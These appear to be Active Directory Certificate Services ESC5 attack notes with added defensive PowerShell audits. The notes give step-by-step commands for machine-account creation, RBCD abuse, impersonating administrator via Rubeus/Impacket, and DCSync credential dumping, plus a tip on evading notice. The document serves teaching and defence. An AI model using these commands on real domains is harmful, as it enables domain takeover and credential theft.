# ESC5

**What is ESC5?**

ESC5 exploits **overly permissive ACLs on privileged AD CS objects**. The weakness is not in the certificate templates themselves but in the underlying PKI infrastructure objects:

| Vulnerable Object                   | Example Abuse                              |
| ----------------------------------- | ------------------------------------------ |
| CA server computer object           | RBCD / Shadow Credentials → admin access   |
| Certificate Templates container     | GenericWrite → create malicious templates  |
| Certification Authorities container | ACL misconfiguration → persistence         |
| NTAuthCertificates object           | Modify trusted CAs → domain persistence    |
| CA's RPC/DCOM server                | Reconfigure AD CS settings for later abuse |

Compromising the CA server gives full control over the PKI, enabling **domain persistence**, **golden certificate attacks**, and the setup of further ESC abuses.
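The table above is also the audit list a defender should walk. The following PowerShell is an added example, not code from the original notes: it reads the DACL of each ESC5-relevant object (the Certificate Templates container, the Certification Authorities container, NTAuthCertificates, and the CA host's computer object) and reports any principal outside an expected allow-list that holds a right capable of changing the object or its DACL. It assumes the ActiveDirectory RSAT module, read access to the Configuration partition, a placeholder CA host name `cb-ca`, and a placeholder `$trusted` list that must be adapted to the environment.

```powershell
# Added example (not from the original notes): audit write-capable ACEs on the
# AD CS infrastructure objects that ESC5 targets.
# Assumptions: ActiveDirectory RSAT module; 'cb-ca' is a placeholder CA host name;
# $trusted is a placeholder allow-list to tune per environment.
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiRoot  = "CN=Public Key Services,CN=Services,$configNC"

# Objects from the ESC5 table plus the CA host's own computer object.
$targets = @(
    "CN=Certificate Templates,$pkiRoot",
    "CN=Certification Authorities,$pkiRoot",
    "CN=NTAuthCertificates,$pkiRoot",
    (Get-ADComputer -Identity 'cb-ca').DistinguishedName   # placeholder CA host
)

# Rights that let a principal alter the object, its attributes, or its DACL.
$dangerousRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'

# Principals expected to hold such rights; anything else becomes a finding.
$trusted = @(
    'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER',
    "$env:USERDOMAIN\Domain Admins", "$env:USERDOMAIN\Enterprise Admins",
    "$env:USERDOMAIN\Cert Publishers"
)

function Get-Esc5AclFinding {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    # The AD: drive is provided by the ActiveDirectory module.
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.ActiveDirectoryRights -notmatch $dangerousRights) { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        [pscustomobject]@{
            Object     = $DistinguishedName
            Principal  = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            ObjectType = $ace.ObjectType      # non-empty GUID = right scoped to one attribute/class
            Inherited  = $ace.IsInherited
        }
    }
    # The owner can always rewrite the DACL, so an unexpected owner is a finding too.
    if ($trusted -notcontains $acl.Owner) {
        [pscustomobject]@{
            Object = $DistinguishedName; Principal = $acl.Owner
            Rights = 'Owner'; ObjectType = $null; Inherited = $false
        }
    }
}

$findings = foreach ($dn in $targets) { Get-Esc5AclFinding -DistinguishedName $dn }
$findings | Format-Table -AutoSize
```

A `WriteProperty` ACE with a non-empty `ObjectType` GUID is scoped to a single attribute or attribute set and may be legitimate (for example, a CA's own rights on the Enrollment Services objects), so review those rows before treating them as findings; unscoped `WriteProperty`, `GenericWrite`, `WriteDacl`, `WriteOwner` or `GenericAll` for a non-administrative principal is the condition ESC5 depends on.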

***

### Exploitation Using Windows

**Step 1: Identify RBCD Opportunities**

* Check if any user has sufficient permissions to configure RBCD on the CA server:

```cmd
Get-RBCD-Threaded.exe -d domain.corp
```

* You can also enumerate ACLs using **PowerView**, **AD Module**, or **BloodHound**.

***

**Step 2: Create a Fake Machine Account**

* By default, any domain user can create up to 10 computer accounts:

```cmd
SharpAllowedToAct.exe --computeraccountname FAKEMACHINE --computerpassword 'Passw0rd!' --targetcomputer cb-ca --domain abcd.corp -a dc01.abcd.corp
```

> **Tip:** In real assessments, name the fake computer something that blends in with existing naming conventions.

***

**Step 3: Compute the RC4 Hash**

```cmd
Rubeus.exe hash /password:'Passw0rd!'
```

***

**Step 4: Abuse RBCD to Impersonate Administrator**

Request a service ticket for each required SPN and inject it.

**CIFS** (file system access, used to verify admin access):

```cmd
Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<RC4_HASH> /msdsspn:cifs/cb-ca.abcd.corp /impersonate:administrator /domain:abcd.corp /dc:dc01.abcd.corp /ptt
```

**HTTP** (for WinRM / remote management):

```cmd
Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<RC4_HASH> /msdsspn:http/cb-ca.abcd.corp /impersonate:administrator /domain:abcd.corp /dc:dc01.abcd.corp /ptt
```

**LDAP** (for DCSync):

```cmd
Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<RC4_HASH> /msdsspn:ldap/dc01.abcd.corp /impersonate:administrator /domain:abcd.corp /dc:dc01.abcd.corp /ptt
```
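Steps 2 to 4 rely on two domain settings (a non-zero MachineAccountQuota and writable `msDS-AllowedToActOnBehalfOfOtherIdentity` on the CA host) and leave a visible state behind (the delegation ACE and a freshly created computer object). The PowerShell below is an added example, not code from the original notes, that reads those settings, decodes the delegation descriptor the attack writes, lists recently created computer accounts with their creator SID, and provides the corresponding remediation. It assumes the ActiveDirectory RSAT module and a placeholder CA host name `cb-ca`.

```powershell
# Added example (not from the original notes): check and remediate the RBCD
# prerequisites and state used in Steps 2-4.
# Assumptions: ActiveDirectory RSAT module; 'cb-ca' is a placeholder host name.
Import-Module ActiveDirectory

function Get-MachineAccountQuota {
    # ms-DS-MachineAccountQuota lives on the domain head; the default of 10 is
    # what lets any domain user create the fake computer account.
    $domainDN = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $domainDN -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    # Remediation: Set-ADDomain -Identity $domainDN -Replace @{'ms-DS-MachineAccountQuota'='0'}
}

function Get-RbcdDelegate {
    param([Parameter(Mandatory)][string]$ComputerName)
    # The AD module exposes msDS-AllowedToActOnBehalfOfOtherIdentity as an
    # ActiveDirectorySecurity object; each Allow ACE names an account that may
    # obtain service tickets to this host on behalf of other users (S4U2Proxy).
    $obj = Get-ADComputer -Identity $ComputerName -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $sd  = $obj.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    if ($null -eq $sd) { return }    # attribute not set: no RBCD on this host
    foreach ($ace in $sd.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        [pscustomobject]@{
            Target   = $ComputerName
            Delegate = $ace.IdentityReference.Value
            Rights   = $ace.ActiveDirectoryRights
        }
    }
}

function Get-RecentComputerAccount {
    param([int]$Days = 7)
    # Computer objects created through the MachineAccountQuota path carry the
    # creating user's SID in mS-DS-CreatorSID; domain-joins by admins do not.
    $since = (Get-Date).AddDays(-$Days)
    Get-ADComputer -Filter { whenCreated -ge $since } -Properties whenCreated, 'mS-DS-CreatorSID' |
      Select-Object Name, whenCreated, @{
          n = 'CreatorSID'
          e = {
              if ($_.'mS-DS-CreatorSID') {
                  (New-Object System.Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)).Value
              }
          }
      }
}

function Clear-RbcdDelegation {
    param([Parameter(Mandatory)][string]$ComputerName)
    # Remediation: drop the delegation entirely; rerun Get-RbcdDelegate to confirm.
    Set-ADComputer -Identity $ComputerName -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
}

# Read-only usage:
"MachineAccountQuota: $(Get-MachineAccountQuota)"
Get-RbcdDelegate -ComputerName 'cb-ca' | Format-Table -AutoSize
Get-RecentComputerAccount -Days 30 | Format-Table -AutoSize
```

A CA host that has any delegate at all in `msDS-AllowedToActOnBehalfOfOtherIdentity` deserves an explanation, since a CA normally has no reason to accept delegated authentication; a recent computer object whose `CreatorSID` resolves to an ordinary user is the footprint of Step 2.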

***

**Step 5: Verify Access**

```cmd
klist
dir \\dc01.abcd.corp\c$
winrs -r:dc01.abcd.corp cmd.exe
```

***

**Step 6: Post-Compromise Options**

Once you have admin access to the CA server, several paths open up.

**DCSync (using the LDAP ticket):**

```cmd
BetterSafetyKatz.exe "lsadump::dcsync /user:abcd\krbtgt /domain:abcd.corp" "exit"
BetterSafetyKatz.exe "lsadump::dcsync /user:abcd\administrator /domain:abcd.corp" "exit"
```

**Misconfigure a template for ESC4-style abuse:** Modify an existing template to be exploitable (see ESC4 notes).

**Golden Certificate attack:** Steal the root CA private key and forge certificates for any account; this persists even after password resets.
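Both persistence paths above (a forged-certificate chain or a modified NTAuthCertificates object, as listed in the ESC5 table) end with a certificate that the domain trusts for logon but that no legitimate enterprise CA issued. The PowerShell below is an added example, not code from the original notes: it compares the CA certificates stored in NTAuthCertificates against the CA objects published under Certification Authorities and under Enrollment Services (the standard container that holds one `pKIEnrollmentService` object per enterprise CA, an assumption about the environment rather than something the notes mention) and flags any NTAuth entry without a matching published CA. It assumes the ActiveDirectory RSAT module.

```powershell
# Added example (not from the original notes): find certificates trusted for
# domain logon (NTAuthCertificates) that no published enterprise CA accounts for.
# Assumptions: ActiveDirectory RSAT module; standard Public Key Services layout.
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiRoot  = "CN=Public Key Services,CN=Services,$configNC"

function ConvertTo-X509 {
    param([byte[]]$Raw)
    [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($Raw)
}

function Get-NtAuthCertificate {
    # cACertificate on NTAuthCertificates is multi-valued; each value is DER.
    $obj = Get-ADObject -Identity "CN=NTAuthCertificates,$pkiRoot" -Properties cACertificate
    foreach ($raw in $obj.cACertificate) { ConvertTo-X509 -Raw $raw }
}

function Get-PublishedCaCertificate {
    # Enrollment Services: one pKIEnrollmentService object per enterprise CA.
    # Certification Authorities: root/intermediate certificationAuthority objects.
    $containers = @("CN=Enrollment Services,$pkiRoot", "CN=Certification Authorities,$pkiRoot")
    foreach ($container in $containers) {
        $objs = Get-ADObject -SearchBase $container -SearchScope OneLevel -Filter * -Properties cACertificate
        foreach ($o in $objs) {
            foreach ($raw in $o.cACertificate) { ConvertTo-X509 -Raw $raw }
        }
    }
}

function Find-UnexpectedNtAuthEntry {
    $known = @(Get-PublishedCaCertificate | ForEach-Object { $_.Thumbprint })
    foreach ($cert in Get-NtAuthCertificate) {
        [pscustomobject]@{
            Subject    = $cert.Subject
            Thumbprint = $cert.Thumbprint
            NotAfter   = $cert.NotAfter
            KnownCA    = ($known -contains $cert.Thumbprint)
        }
    }
}

# Entries with KnownCA = False are trusted for logon but not backed by a published CA.
Find-UnexpectedNtAuthEntry | Sort-Object KnownCA | Format-Table -AutoSize
```

Legitimate exceptions exist (a CA from a trusted forest or a third-party CA deliberately added to NTAuth), so keep a baseline of expected thumbprints and alert on additions to it; a golden certificate forged with the real CA key will show as `KnownCA = True`, which is why key custody on the CA host, and not only this comparison, is part of the control.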

***

### **Exploitation Using Linux**

**Step 1: Add a Fake Machine Account**

```bash
addcomputer.py -computer-name 'FAKEMACHINE02$' -computer-pass 'Passw0rd!' -dc-ip <DC_IP> -hashes :<NT_HASH> 'domain.corp/username'
```

**Step 2: Configure RBCD**

```bash
rbcd.py -dc-ip <DC_IP> -t cb-ca -f FAKEMACHINE02 -hashes :<NT_HASH> 'domain.corp/username'
```

**Step 3: Request a Service Ticket**

```bash
getST.py -spn cifs/cb-ca.domain.corp -impersonate administrator -dc-ip <DC_IP> 'domain.corp/FAKEMACHINE02$:Passw0rd!'
```

**Step 4: Load the Ticket & Execute**

```bash
export KRB5CCNAME=administrator.ccache
klist
wmiexec.py -dc-ip <DC_IP> -k -no-pass domain.corp/administrator@cb-ca.domain.corp
```

**Step 5: Dump Credentials**

```bash
secretsdump.py domain.corp/administrator@dc01.domain.corp -k -no-pass
```

***

### **Key Differences from Template-Based ESCs**

|                  | Template ESCs (ESC1–4)    | ESC5                                 |
| ---------------- | ------------------------- | ------------------------------------ |
| **Target**       | Certificate templates     | PKI infrastructure objects           |
| **Prerequisite** | Enroll rights on template | Write/GenericWrite on CA objects     |
| **Primary tool** | Certify / Certipy         | RBCD tools + Rubeus / Impacket       |
| **Impact**       | Certificate impersonation | Full CA control + domain persistence |

#### **Tools Reference**

| Tool                                                                                     | Platform | Purpose                                        |
| ---------------------------------------------------------------------------------------- | -------- | ---------------------------------------------- |
| [Get-RBCD-Threaded](https://github.com/FatRodzianko/Get-RBCD-Threaded/releases/tag/1.05) | Windows  | Enumerate RBCD opportunities                   |
| [SharpAllowedToAct](https://github.com/pkb1s/SharpAllowedToAct)                          | Windows  | Configure RBCD / create machine accounts       |
| [Rubeus](https://github.com/GhostPack/Rubeus/releases/tag/1.6.4)                         | Windows  | Compute hashes, S4U2Self/Proxy, inject tickets |
| [BetterSafetyKatz](https://github.com/Flangvik/BetterSafetyKatz)                         | Windows  | DCSync via Mimikatz wrapper                    |
| [addcomputer.py](https://github.com/fortra/impacket/blob/master/examples/addcomputer.py) | Linux    | Add fake machine account                       |
| [rbcd.py](https://github.com/AlteredSecurity/RBCD)                                       | Linux    | Configure RBCD delegation                      |
| [getST.py](https://github.com/fortra/impacket/blob/master/examples/getST.py)             | Linux    | Request service ticket via S4U                 |
| [wmiexec.py](https://github.com/fortra/impacket/blob/master/examples/wmiexec.py)         | Linux    | Remote execution using Kerberos ticket         |
| [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) | Linux    | Dump credentials post-compromise               |
